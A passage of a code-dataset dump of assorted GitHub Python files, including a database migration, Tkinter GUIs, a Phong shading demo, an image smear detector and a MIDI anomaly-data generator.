","repo_name":"FelipeMartins96/play_fira","sub_path":"rsim/rsim.py","file_name":"rsim.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35788328174","text":"\"\"\"Initial migration.\n\nRevision ID: 1a37101df3a7\nRevises: \nCreate Date: 2021-12-06 17:11:12.213712\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '1a37101df3a7'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('department_db', sa.Column('organisation3', sa.String(length=64), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('department_db', 'organisation3')\n # ### end Alembic commands ###\n","repo_name":"ArturIvanichyk/epam_winter2021_project","sub_path":"department_app/migrations/versions/1a37101df3a7_initial_migration.py","file_name":"1a37101df3a7_initial_migration.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"117540311","text":"def count_substring(string, sub_string):\n sub_l = len(sub_string)\n cnt = 0\n for i in range(0,len(string)):\n if string[i:sub_l+i] == sub_string:\n #print(string[i:(sub_l+i)])\n cnt += 1\n return cnt\n\n\nif __name__ == '__main__':\n a = 'Rameame'\n b = 'ame'\n cnt = count_substring(a,b)\n print(cnt)\n","repo_name":"Rameshganesan/Mypython","sub_path":"cnt_of_substring.py","file_name":"cnt_of_substring.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70554679447","text":"import tkinter as tk\nfrom PIL import Image, ImageTk\nfrom SimulatorWL import SimuladorLineaEspera\nfrom functools import partial\n\nclass SimuladorInterfaz(tk.Tk):\n def __init__(self):\n super().__init__()\n\n # Variables de la interfaz\n self.num_servidores_var = tk.StringVar(value=\"5\")\n self.imagenes_var = []\n\n # Configuración de la ventana principal\n self.title(\"Simulador de Línea de Espera\")\n self.geometry(\"800x600\")\n\n # Etiqueta y campo de entrada para el número de servidores\n tk.Label(self, text=\"Número de Servidores:\").pack(pady=10)\n entry_num_servidores = tk.Entry(self, textvariable=self.num_servidores_var)\n entry_num_servidores.pack(pady=10)\n\n # Botón para iniciar la simulación\n tk.Button(self, text=\"Iniciar Simulación\", command=self.iniciar_simulacion).pack(pady=10)\n\n # Marco para mostrar las imágenes de los vehículos\n self.marco_imagenes = tk.Frame(self)\n self.marco_imagenes.pack(pady=10)\n\n # Configuración del simulador\n self.simulador = SimuladorLineaEspera(711.44, 2, 5)\n\n def cargar_imagenes(self):\n # Cargar las imágenes desde los archivos (puedes cambiar las rutas según tus necesidades)\n paths_imagenes = [\"source/models/img/auto.jpg\", \"source/models/img/buses.jpg\", \"source/models/img/campero.jpg\"]\n self.imagenes_var = [ImageTk.PhotoImage(Image.open(path).resize((20, 20))) for path in paths_imagenes]\n\n def mostrar_imagen_vehiculo(self, tipo_vehiculo):\n # Obtener el índice correspondiente al tipo de vehículo\n index = self.simulador.clients.get_index_by_vehicle_type(tipo_vehiculo)\n\n # Actualizar la imagen correspondiente en el marco\n if index is not None and index < len(self.imagenes_var):\n imagen = self.imagenes_var[index]\n tk.Label(self.marco_imagenes, image=imagen).pack(side=tk.LEFT)\n self.update_idletasks() # Actualizar la interfaz para que se muestre la imagen\n self.after(2000, self.limpiar_imagen_vehiculo) # Esperar 2 segundos y limpiar la imagen\n\n def limpiar_imagen_vehiculo(self):\n # Limpiar el marco después de mostrar la imagen\n for widget in self.marco_imagenes.winfo_children():\n widget.destroy()\n\n def iniciar_simulacion(self):\n # Cargar las imágenes de los vehículos\n self.cargar_imagenes()\n\n # Realizar la simulación\n self.simulador.generateArrival(10)\n\n # Mostrar las imágenes de los vehículos generados con una espera de 2 segundos entre cada cliente\n for cliente_info in self.simulador.clients.client_info:\n _, tipo_vehiculo, _, _, _, _ = cliente_info\n self.mostrar_imagen_vehiculo(tipo_vehiculo)\n\n\nif __name__ == \"__main__\":\n app = SimuladorInterfaz()\n app.mainloop()\n","repo_name":"TCfajardo/WaitingLines","sub_path":"source/models/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32618007243","text":"# Maintainer: Patrick Nikanti 2023\n\nimport sys\nimport os\nimport time\nimport json\nfrom psycopg2._psycopg import cursor as psqlcursor\nfrom connect import Connect, connect\n\ndef dump(db_name: str, table: str, filepath: str, credentials_filepath: str = \"secrets.json\"):\n \"\"\"\n Dump JSON file into a psql table.\n \"\"\"\n psql: Connect = connect(dbname=db_name)\n database: psqlcursor = psql.database\n database.execute(\n f\"SELECT count(*) from {table}\"\n )\n\n with open(filepath, \"r\") as handle:\n data: str = json.load(handle)\n id = database.fetchone()[0]\n now = int(time.time())\n username = os.getlogin()\n\n database.execute(\n f\"INSERT INTO {table} (id, username, timestamp, data) VALUES({id}, {username}, {now}, '{json.dumps(data)}')\"\n )\n\nif __name__ == '__main__':\n db_name = str(sys.argv[1])\n table = str(sys.argv[2])\n filepath = str(sys.argv[3])\n \n dump(\n dbname=db_name,\n table=table,\n filepath=filepath\n )\n","repo_name":"Pnikanti/TVT","sub_path":"lab/postgresql/dump.py","file_name":"dump.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3425944325","text":"# https://www.acmicpc.net/problem/10845\n\nimport sys\n\nn = int(input())\nqueue = []\n\nfor _ in range(n):\n cmd = sys.stdin.readline().split()\n\n if len(cmd) > 1:\n x = cmd[1]\n queue.append(x)\n else:\n if cmd[0] == 'pop':\n if len(queue) != 0:\n print(queue[0])\n queue.pop(0)\n else:\n print(-1)\n elif cmd[0] == 'size':\n print(len(queue))\n elif cmd[0] == 'empty':\n print(1) if len(queue) == 0 else print(0)\n elif cmd[0] == 'front':\n print(queue[0]) if len(queue) != 0 else print(-1)\n elif cmd[0] == 'back':\n print(queue[len(queue)-1]) if len(queue) != 0 else print(-1)","repo_name":"imlynmi/baekjoon","sub_path":"10845.py","file_name":"10845.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4028940017","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom PIL import ImageTk, Image\r\nimport datetime\r\nfrom datetime import time, date\r\n\r\nclass MainPointMonthTable(tk.Toplevel):\r\n def __init__(self):\r\n super().__init__()\r\n self.init_main()\r\n \r\n def init_main(self):\r\n\r\n self.grab_set()\r\n self.focus_set()\r\n\r\n label1 = tk.Label(self, text = 'Выберите отдел:',bg = 'white', font = (\"Helvetica\", 9, \"bold\"))\r\n label1.place(x = 100 , y = 20)\r\n\r\n label2 = tk.Label(self, text = 'Отдел:',bg = 'white')\r\n label2.place(x = 100 , y = 60)\r\n\r\n self.entery_point = ttk.Combobox(self, values = ['Сити1', 'Сити2','Сити3','Ман1','Ман2','Радуга','ТДЖ','Сити4','Вавилон','Искра','Магнит','Рынок7','Валентина'])\r\n self.entery_point.insert(0, 'Сити1')\r\n self.entery_point.place(x = 160, y = 60)\r\n\r\n btn_show = tk.Button(self, text = 'Показать',bg = 'white')\r\n btn_show.bind('', lambda event: self.open_table(self.entery_point.get()))\r\n btn_show.place(x = 100, y = 100)\r\n\r\n def open_table(self, point):\r\n Table(point)\r\n \r\nclass Table(tk.Toplevel):\r\n def __init__(self, point):\r\n super().__init__()\r\n self.point = point\r\n self.init_main()\r\n \r\n def init_main(self):\r\n self.title(self.point + \" за месяцы лет\")\r\n self[\"bg\"] = \"white\"\r\n self.resizable(False, False)\r\n self.grab_set()\r\n self.focus_set()\r\n \r\n sells = pd.read_csv('d://Apps/Data/Sells.csv')\r\n general_expense = pd.read_csv('d://Apps/Data/GeneralExpense.csv')\r\n point_expense = pd.read_csv('d://Apps/Data/PointExpense.csv')\r\n text = sells.columns.values\r\n for i in range(len(sells[text[0]])):\r\n m = datetime.datetime.strptime(sells['Date'].loc[i],\"%Y-%m-%d\").date()\r\n sells.loc[i, 'Date'] = str(m.strftime(\"%B\"))\r\n sells.loc[i, 'ID'] = int(m.strftime(\"%Y\"))\r\n sells.rename(columns={ 'Date': 'Month', 'ID':'Year','Price':'Sum'}, inplace=True)\r\n sells = sells.groupby(by=['Year','Month','Point'], as_index = False).sum()\r\n\r\n general_expense = general_expense.groupby(by=['Year','Month'], as_index = False).sum()\r\n\r\n point_expense = point_expense.groupby(by=['Year','Month', 'Point'], as_index = False).sum()\r\n text1 = sells.columns.values\r\n text2 = point_expense.columns.values\r\n for i in range(len(sells[text1[0]])):\r\n for j in range(len(point_expense[text2[0]])):\r\n if sells.loc[i]['Year'] == point_expense.loc[j]['Year']:\r\n if sells.loc[i]['Month'] == point_expense.loc[j]['Month']:\r\n if sells.loc[i]['Point'] == point_expense.loc[j]['Point']:\r\n sells.loc[i,'Sum'] = sells.loc[i]['Sum'] - point_expense.loc[j]['Sum']\r\n new_df = sells\r\n\r\n general_expense = pd.read_csv('d://Apps/Data/GeneralExpense.csv')\r\n general_expense = general_expense.groupby(by=['Year','Month'], as_index = False).sum()\r\n numbers_points = pd.read_csv('d://Apps/Data/NumbersOfPoints.csv')\r\n text = general_expense.columns.values\r\n for i in range(len(general_expense[text[0]])):\r\n y = int(general_expense.loc[i]['Year'])\r\n m = str(general_expense.loc[i]['Month'])\r\n s = int(general_expense.loc[i]['Sum'])\r\n \r\n mask = numbers_points['Year'].values == y\r\n df = numbers_points[mask]\r\n n = int(df[m])\r\n general_expense.loc[i,'Sum'] = round(s / n, 2)\r\n minus_general = general_expense\r\n\r\n text1 = new_df.columns.values\r\n text2 = minus_general.columns.values\r\n for i in range(len(new_df[text1[0]])):\r\n for j in range(len(minus_general[text2[0]])):\r\n if new_df.loc[i]['Year'] == minus_general.loc[j]['Year']:\r\n if new_df.loc[i]['Month'] == minus_general.loc[j]['Month']:\r\n new_df.loc[i,'Sum'] = new_df.loc[i]['Sum'] - minus_general.loc[j]['Sum']\r\n\r\n\r\n sells = new_df\r\n #конец вычитания ---------------------------------------------------------------------------------------------------\r\n \r\n mask = sells['Point'].values == self.point\r\n sells = sells[mask]\r\n df = pd.DataFrame(columns = ['Year','January','February','March','April','May','June','July','August','September','October','November','December','Total','Mean'])\r\n years = sells.groupby(by=['Year'], as_index = False).sum()[\"Year\"].to_list()\r\n for i in years:\r\n n = np.nan\r\n list1 = list1 = [i,n,n,n,n,n,n,n,n,n,n,n,n,n,n]\r\n df.loc[i] = list1\r\n text = sells.columns.values\r\n for i in range(len(sells[text[0]])):\r\n df.loc[int(sells.iloc[i]['Year']), str(sells.iloc[i]['Month'])] = round(sells.iloc[i]['Sum'],1)\r\n month_list = ['January','February','March','April','May','June','July','August','September','October','November','December'] \r\n df_sum = df[month_list]\r\n df['Total'] = df_sum.sum(axis=1)\r\n df['Mean'] = round(df_sum.mean(axis = 1,skipna = 1),2)\r\n\r\n columns = ['Year','January','February','March','April','May','June','July','August','September','October','November','December','Total', 'Mean']\r\n columns_rus = ['Год','Январь','Февраль','Март','Апрель','Май','Июнь','Июль','Август','Сентябрь','Октябрь','Ноябрь','Декабрь','Итого','Средние']\r\n self.tree = ttk.Treeview(self, columns = columns, height = 15, show = 'headings')\r\n self.vsb = tk.Scrollbar(self, orient=\"vertical\", command=self.tree.yview)\r\n self.tree.configure(yscrollcommand=self.vsb.set)\r\n self.vsb.pack(side=\"right\", fill=\"y\")\r\n \r\n for i in columns:\r\n self.tree.column(i, width = 100, anchor = tk.CENTER)\r\n \r\n for i in columns:\r\n m = columns_rus[columns.index(i)]\r\n self.tree.heading(i, text = m)\r\n \r\n data = df\r\n data = data.set_index(np.arange(len(data.index))) \r\n text = data.columns.values\r\n for i in range(len(data[text[0]])):\r\n self.tree.insert('', 'end', text=data[text[0]][i], values=list(map(lambda x: data[x][i], text[0:])))\r\n \r\n self.tree.pack(side=tk.TOP,fill=tk.X)","repo_name":"egormarusev/Something","sub_path":"AppForMother/Scripts/TablePointMonth.py","file_name":"TablePointMonth.py","file_ext":"py","file_size_in_byte":6598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8575158375","text":"import sys, pygame\nfrom pygame import K_UP, K_DOWN, K_LEFT, K_RIGHT, K_PERIOD, K_COMMA\nfrom itertools import product\nfrom numpy import multiply, subtract, dot\nfrom math import sqrt\nfrom colorsys import hls_to_rgb, hsv_to_rgb\n\nX_SIZE = 400\nY_SIZE = 400\nscreen_size = (X_SIZE, Y_SIZE)\n\nCENTER_POINT = [X_SIZE/2, Y_SIZE/2, X_SIZE/2]\nRADIUS = 100\nLIGHT_SOURCE_POSITION = [150, 250, 0]\nOBSERVER_POSITION = [200, 200, 0]\n\nBALL_COLOR = 0.1\nCOLOR_SATURATION = 0.5\n\nX = 0\nY = 1 \nZ = 2\n\nSTEP = 50 \n\nIa = 1 # natężenie światła w otoczeniu obiektu\nIp = 1 # natężenie światła punktowego\nKa = 0.2 # współczynnik odbicia światła otoczenia\n\nKs = 0.1 # współczynnik odbicia światła kierunkowego \nKd = 0.4 # współczynnik odbicia światła rozproszonego \nn = 10 # współczynnik gładkości powierzchni\n\nmove_keys = { K_UP: lambda: move(STEP, Y), K_DOWN: lambda: move(-STEP, Y), K_RIGHT: lambda: move(STEP, X), \n K_LEFT: lambda: move(-STEP, X), K_PERIOD: lambda: move(STEP, Z), K_COMMA: lambda: move(-STEP, Z)}\n\n\ndef find_z_coordinate(x, y):\n b = -2 * CENTER_POINT[2]\n c = CENTER_POINT[2]**2 + (x - CENTER_POINT[0])**2 + (y - CENTER_POINT[1])**2 - RADIUS**2\n delta = b**2 - 4*c\n\n if delta == 0:\n return -b/2\n elif delta > 0:\n return min((sqrt(delta) - b)/2, (-sqrt(delta) - b)/2)\n\ndef calculate_light_source_distance(point):\n x_diff = LIGHT_SOURCE_POSITION[X] - point[X]\n y_diff = LIGHT_SOURCE_POSITION[Y] - point[Y]\n z_diff = LIGHT_SOURCE_POSITION[Z] - point[Z]\n\n return sqrt((x_diff)**2 + (y_diff)**2 + (z_diff)**2)\n\ndef f_att(r): # współczynnik tłumienia źródła z odległością\n C1 = 0.1\n C2 = 0.2\n C3 = 0.25\n\n return min(1/(C1 + C2*r +C3*r**2), 1)\n\ndef calculate_light_intensity(point):\n N = normal_vector(point)\n L = versor(vector(point, LIGHT_SOURCE_POSITION))\n V = versor(vector(point, OBSERVER_POSITION))\n R = versor(subtract(multiply(multiply(N, 2), multiply(N, L)), L))\n\n r = calculate_light_source_distance(point) / 100\n f = f_att(r)\n\n I = phong_model_function(Ia, Ip, Ka, Kd, Ks, f, N, L, R, V, n)\n\n return min(I, 1)\n\ndef normal_vector(point):\n return versor(vector(CENTER_POINT, point))\n\ndef phong_model_function(Ia, Ip, Ka, Kd, Ks, f, N, L, R, V, n):\n\n ambient_light = Ia * Ka\n diffuse_reflection = Ip * f * Kd * max(dot(N,L), 0)\n directional_reflection = Ip * f * Ks * max(dot(R,V),0)**n\n\n return ambient_light + diffuse_reflection + directional_reflection\n\ndef vector(start_point, end_point):\n return [end_point[0] - start_point[0], end_point[1] - start_point[1], end_point[2] - start_point[2]]\n\ndef versor(vector):\n n = sqrt(sum(e**2 for e in vector))\n return [e / n for e in vector]\n\ndef draw():\n x_range = range(X_SIZE)\n y_range = range(Y_SIZE)\n\n for x, y in product(x_range, y_range):\n z = find_z_coordinate(x, y)\n\n if z:\n ilumination = calculate_light_intensity([x, y, z])\n #r, g, b = hsv_to_rgb(BALL_COLOR, 0.8, ilumination)\n r, g, b = hls_to_rgb(BALL_COLOR, ilumination, COLOR_SATURATION)\n color = (255*r,255*g,255*b)\n\n screen.set_at((x, Y_SIZE - y), color)\n\n\ndef move(step, coord):\n LIGHT_SOURCE_POSITION[coord] += step\n print(f'Pozycja źródła światła: {LIGHT_SOURCE_POSITION}')\n\npygame.init()\nscreen = pygame.display.set_mode(screen_size)\n\nwhile True:\n screen.fill((0,0,0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit(0)\n if event.type == pygame.KEYDOWN:\n move_keys[event.key]()\n draw()\n\n pygame.display.flip()","repo_name":"KasiaWiktoria/model_phonga","sub_path":"phong_model.py","file_name":"phong_model.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24656223252","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\n'''\r\nThis approach doesn't seem to leak memory, but it seem slower than the one\r\nin the plot_animated_2d module...\r\n'''\r\n\r\nN_FRAMES = 40\r\nx = np.arange(-200, 200) * .2\r\ny = np.arange(-200, 200).reshape(-1, 1) * .2\r\nbase = np.hypot(x, y)\r\n\r\nf = plt.figure()\r\nax = f.gca()\r\nplot = ax.pcolormesh(x, y, base, cmap='plasma')\r\n\r\nframes = [(base + i)[:-1, :-1].flatten() for i in range(N_FRAMES)]\r\ndef animate(i):\r\n plot.set_array(frames[i])\r\n\r\nanim = animation.FuncAnimation(f, animate, frames=N_FRAMES, interval=60)\r\n\r\nplt.draw()\r\nplt.show()\r\n","repo_name":"tarcisiofischer/examples-and-demos","sub_path":"matplotlib/plot_animated_2d_in_memory_data.py","file_name":"plot_animated_2d_in_memory_data.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36102821459","text":"import cv2\nimport os\nimport sys\nimport numpy as np\n\nroot_dir = 'sample_drive/'\ncheckpoint_dir = 'checkpoints/'\ncam_dir = 'cam_{}/'.format(sys.argv[1])\nimg_dir = root_dir + cam_dir\ndiff_dir = checkpoint_dir + 'diff/'\nprocessed_dir = checkpoint_dir + 'processed/'\n\nos.system('rm {}*'.format(diff_dir))\nos.system('rm {}*'.format(processed_dir))\n\ndef Get_Avg(img_dir):\n\timg_list = os.listdir(img_dir)\n\tfor n,i in enumerate(img_list):\n\t\tpro = ((n + 1) / len(img_list)) * 100.0\n\t\tsys.stdout.write('\\rAveraging images.. {}/{}'.format(n + 1, len(img_list)))\n\t\timg = cv2.imread(img_dir + i)\n\t\tif n == 0:\n\t\t\timg_avg = img\n\t\telse:\n\t\t\timg_avg = img_avg * n / (n+1) + img / (n + 1)\n\treturn img_avg\n\ndef Process(img):\n\tprint ('\\nProcessing image..')\n\t\n\t# img = cv2.GaussianBlur(img,(5,5),0)\n\t# img = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,11,2)\n\t# ret,img = cv2.threshold(img,150,255,cv2.THRESH_BINARY)\n\timg = cv2.equalizeHist(img)\n\timg = cv2.GaussianBlur(img,(7,7),0)\n\t# img = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,25,4)\n\t# ret,img = cv2.threshold(img,35,255,cv2.THRESH_BINARY)\n\t# img = cv2.Canny(img,10,0)\n\n\t\n\treturn img\n\ndef Segment(img,cdir,cam):\n\tprint ('Segmenting..')\t\n\tret,img = cv2.threshold(img,35,255,cv2.THRESH_BINARY)\n\tbi_path = cdir + cam[:-1] + '_bi.jpg'\n\tcv2.imwrite(bi_path,img)\n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(7, 7))\n\timg = cv2.dilate(img,kernel)\n\timg = 255 * np.ones_like(img) - img\n\tret, labels, stats, centroids = cv2.connectedComponentsWithStats(img, connectivity = 8)\n\tthreshhold_l = 0.001\n\tthreshhold_u = 0.1\n\tcc_nums = []\n\tmasks_paths = []\n\tfor i,s in enumerate(stats):\n\t\tif s[-1] > threshhold_l * img.size and s[-1] < threshhold_u * img.size:\n\t\t\tcc_nums.append(i)\n\tfor i,cc in enumerate(cc_nums):\n\t\tmsk = np.array(labels)\n\t\tmsk = np.where(msk == cc, 255,0)\n\t\tmsk_path = cdir + cam[:-1] + '_msk_'+ str(i) +'.jpg'\n\t\tprint (msk_path)\n\t\tcv2.imwrite(msk_path,msk)\n\t\tmasks_paths.append(msk_path)\n\treturn masks_paths\n\ndef Append_mask(masks,img,dir,cam):\n\tfor i,msk_path in enumerate(masks):\n\t\t# msk = cv2.cvtColor(msk, cv2.COLOR_BGR2GRAY)\n\t\t# ret,msk = cv2.threshold(msk,35,255,cv2.THRESH_BINARY)\n\t\t# canny = cv2.Canny(msk,10,0)\n\t\tmsk = cv2.imread(msk_path,0)\n\t\tret,msk = cv2.threshold(msk,127,255,cv2.THRESH_BINARY)\n\t\t# contours, hierarchy = cv2.findContours(msk,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\t\t# cv2.drawContours(msk, contours, -1, (0,255,0), 3)\n\t\tcanny = cv2.Canny(msk,10,0)\n\t\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(3, 3))\n\t\tcanny = cv2.dilate(canny,kernel)\n\n\t\t# cv2.imwrite(checkpoint_dir + cam[:-1] + '_canny_'+ str(i) +'.jpg',canny)\n\t\timg[canny == 255] = (0,0,255)\n\t\tcv2.imwrite(cdir + cam[:-1] + '_smear_'+ str(i) +'.jpg',img)\n\n\n\n\n\n\n'''\ndef Get_Avg_array(img_array_list):\n\tfor n,img in enumerate(img_array_list):\n\t\t# img = cv2.imread(img_dir + i,0)\n\t\tif n == 0:\n\t\t\timg_avg = img\n\t\telse:\n\t\t\timg_avg = img_avg * n / (n+1) + img / (n + 1)\n\t# img_avg = img_sum / len(img_list)\n\treturn img_avg \n'''\n\n\nimg_list = os.listdir(img_dir)\n'''\nfor i in range(1,len(img_list)):\n\t# Process the previous img\n\tpre_img_name = img_list[i-1]\n\tpre_img_path = img_dir + pre_img_name\n\tpre_img = cv2.imread(pre_img_path,0)\n\t# pre_img = Process(pre_img_path)\n\t# cv2.imwrite(processed_dir + pre_img_name,pre_img)\n\n\t# Process the current img\n\timg_name = img_list[i]\n\timg_path = img_dir + img_name\n\timg = cv2.imread(img_path,0)\n\t# img = Process(img_path)\n\t# cv2.imwrite(processed_dir + img_name,img)\n\t\n\n\t# calculate difference\n\timg_diff = img - pre_img\n\tdiff_name = img_name[:-4] + '-' + pre_img_name\n\tcv2.imwrite(diff_dir+diff_name,img_diff)\n\tprint (diff_name)\n'''\n'''\nprocessed_img_list = []\nfor i,img_name in enumerate(img_list):\n\tpro = ((i + 1) / len(img_list)) * 100.0\n\tsys.stdout.write(\"\\rProcessing images: %.2f%%\" % (pro))\n\t# print (img_name)\n\timg_path = img_dir + img_name\n\timg = Process(img_path)\n\tcv2.imwrite(processed_dir + img_name,img)\n\tprocessed_img_list.append(img)\n'''\n\n\n# diff_avg = Get_Avg(diff_dir)\n# cv2.imwrite('miniset/diff_avg.jpg',diff_avg)\n\n# Get the average of the input images (RGB)\n# img_avg = Get_Avg(img_dir)\n\n'''\ndiff_avg = Get_Avg(diff_dir)\ndiff_avg_path = 'miniset/diff_avg.jpg'\ncv2.imwrite(diff_avg_path,diff_avg)\n'''\nimg_avg_path = checkpoint_dir + cam_dir[:-1] + '_img_avg.jpg'\n# cv2.imwrite(img_avg_path, img_avg)\nimg_avg = cv2.imread(img_avg_path,0)\n\n# Process the averaged image\nimg_avg_processed = Process(img_avg)\nimg_avg_processed_path = checkpoint_dir + cam_dir[:-1] + '_img_avg_processed.jpg'\ncv2.imwrite(img_avg_processed_path,img_avg_processed)\n\n# Segment\nmasks = Segment(img_avg_processed, checkpoint_dir, cam_dir)\n\n# Show mask(s)\n# demo_img_path = checkpoint_dir + 'cam_3_demo.jpg'\n# demo_img = cv2.imread(demo_img_path)\n# Append_mask(masks,demo_img,checkpoint_dir, cam_dir)\n\n\n\n\n\n\n\n\n","repo_name":"subtractionxu/smear_detection","sub_path":"smear_detection.py","file_name":"smear_detection.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75022177367","text":"import os\nimport pandas as pd\nimport numpy as np\nimport random\nimport mido\nfrom pathlib import Path\n\n\nimport os\nimport mido\nimport pandas as pd\n\nMAX_TIME_STEPS = 500\n\n\ndef getMidiDF(fileLoc: str):\n # Store the data from the MIDI file in a list of dictionaries\n mid = mido.MidiFile(fileLoc, clip=True)\n midi_data = []\n for i, track in enumerate(mid.tracks):\n addTime = 0\n for msg in track:\n if msg.type == \"note_on\":\n addTime += msg.time\n midi_data.append(\n {\n \"track\": i,\n \"note\": msg.note,\n \"velocity\": msg.velocity,\n \"time\": msg.time,\n }\n )\n\n # Convert the list of dictionaries to a Pandas DataFrame\n df = pd.DataFrame(midi_data)\n\n # Check if the DataFrame has fewer than MAX_TIME_STEP rows\n if df.shape[0] < MAX_TIME_STEPS:\n # Calculate the number of rows to pad with zeros\n num_rows_to_pad = MAX_TIME_STEPS - df.shape[0]\n\n # Create a new DataFrame with the necessary number of rows and columns\n padded_df = pd.DataFrame(\n np.zeros((num_rows_to_pad, df.shape[1])), columns=df.columns\n )\n\n # Concatenate the original DataFrame and the padded DataFrame\n df = pd.concat([df, padded_df])\n\n df = df[:MAX_TIME_STEPS]\n\n df.to_csv(\n os.path.join(\"csvMidiData\", fileLoc.split(\"\\\\\")[-1].split(\".\")[0] + \".csv\"),\n index=False,\n )\n return df\n\n\ndef getAllMidiDFs(root_folder):\n # Create the output directory if it doesn't exist\n os.makedirs(\"midiData\", exist_ok=True)\n\n for root, dirs, files in os.walk(root_folder):\n for filename in files:\n if filename.endswith(\".mid\"):\n fileLoc = os.path.join(root, filename)\n getMidiDF(fileLoc)\n\n\n# getAllMidiDFs(\"./midiData\")\n\n\ndef add_anomaly_column(csv_file_path, master_changes_file_path, percent_modified):\n # Load the CSV file into a pandas DataFrame\n df = pd.read_csv(csv_file_path)\n df = df.head(500)\n # Add an \"anomaly\" column filled with zeros\n df[\"anomaly\"] = 0\n\n # Create a new DataFrame to store the changes made\n changes_df = pd.DataFrame(columns=[\"filename\", \"row\", \"column\", \"amount\"])\n\n # Iterate over each row in the DataFrame and modify a random column for a random subset of rows\n num_anomalies = int(len(df) * percent_modified)\n for i in random.sample(range(len(df)), num_anomalies):\n # Modify a random column\n cols = random.sample([\"note\", \"velocity\", \"time\"], k=random.randint(1, 3))\n for col in cols:\n options = df[col].unique()\n\n if col == \"time\":\n # If \"time\" column is selected, choose a unique time value from the DataFrame\n unique_times = df[\"time\"].unique()\n unique_times = unique_times[unique_times != df.at[i, col]]\n new_time = random.choice(unique_times)\n amount = new_time - df.at[i, col]\n df.at[i, col] = new_time\n elif col == \"velocity\":\n # If \"velocity\" column is selected, choose a random value from a list and add it to the velocity value\n velocity = int(df.at[i, col])\n offset = (\n random.randint(-80, -20)\n if velocity >= 80\n else random.randint(20, 80)\n )\n new_velocity = min(max(velocity + offset, 0), 127)\n amount = new_velocity - velocity\n df.at[i, col] = new_velocity\n elif col == \"note\":\n # If \"note\" column is selected, choose a random value from a list and add it to the note value\n note = int(df.at[i, col])\n offset = random.choice(\n [-13, -12, -11, -6, -5, -3, -1, 1, 3, 5, 6, 11, 12, 13]\n )\n new_note = min(max(note + offset, 0), 127)\n amount = new_note - note\n df.at[i, col] = new_note\n else:\n # For other columns, choose a random value from the options and set the value to that\n new_value = random.choice(options)\n amount = new_value - df.at[i, col]\n df.at[i, col] = new_value\n\n # Log the changes made\n row = i + 2\n new_changes_df = pd.DataFrame(\n {\n \"filename\": f\"{csv_file_path.split('/')[-1]}{i}\",\n \"row\": row,\n \"column\": col,\n \"amount\": amount,\n },\n index=[i],\n )\n changes_df = pd.concat([changes_df, new_changes_df])\n\n # Set the \"anomaly\" flag for the modified row to 1\n df.at[i, \"anomaly\"] = len(cols)\n\n # Write the modified DataFrame to a new CSV file\n csv_filename = os.path.splitext(os.path.basename(csv_file_path))[0]\n modified_csv_file_path = os.path.join(\n \"anomalous\",\n f\"{csv_filename}_modified{str(percent_modified)[0] + str(round(percent_modified, 2))[-2:]}.csv\",\n )\n\n df.to_csv(modified_csv_file_path, index=False)\n\n # Append the changes made to the master changes CSV file\n changes_df.to_csv(master_changes_file_path, mode=\"a\", header=False, index=False)\n print(\n os.path.join(\n \"anomalous\",\n f\"{csv_filename}_modified{str(percent_modified)[0] + str(round(percent_modified, 2))[-2:]}.csv\",\n )\n )\n\n\ndef generate_anomalous_data(csv_data_dir, master_changes_file):\n # Walk through every file in the csvMidiData directory\n for root, dirs, files in os.walk(csv_data_dir):\n for file in files:\n if file.endswith(\".csv\"):\n # Call the add_anomaly_column function six times, with percent_modified increasing by 0.1 each time\n percent_modified = 0.78\n for i in range(4):\n add_anomaly_column(\n os.path.join(root, file), master_changes_file, percent_modified\n )\n percent_modified += 0.06\n\n\ndef set_anomaly_column_none(csv_file_path):\n # Load the CSV file into a pandas DataFrame\n df = pd.read_csv(csv_file_path)\n df = df.head(500)\n\n # Add an \"anomaly\" column filled with zeros\n df[\"anomaly\"] = 0\n\n # Define ranges of sensible note and velocity changes\n note_change_range = range(-12, 13)\n velocity_change_range = range(-30, 31)\n\n # Randomly select note and velocity changes\n note_change = np.random.choice(note_change_range)\n velocity_change = np.random.choice(velocity_change_range)\n\n # Clip note and velocity changes at MIDI bounds\n df[\"note\"] = np.clip(df[\"note\"] + note_change, 0, 127)\n df[\"velocity\"] = 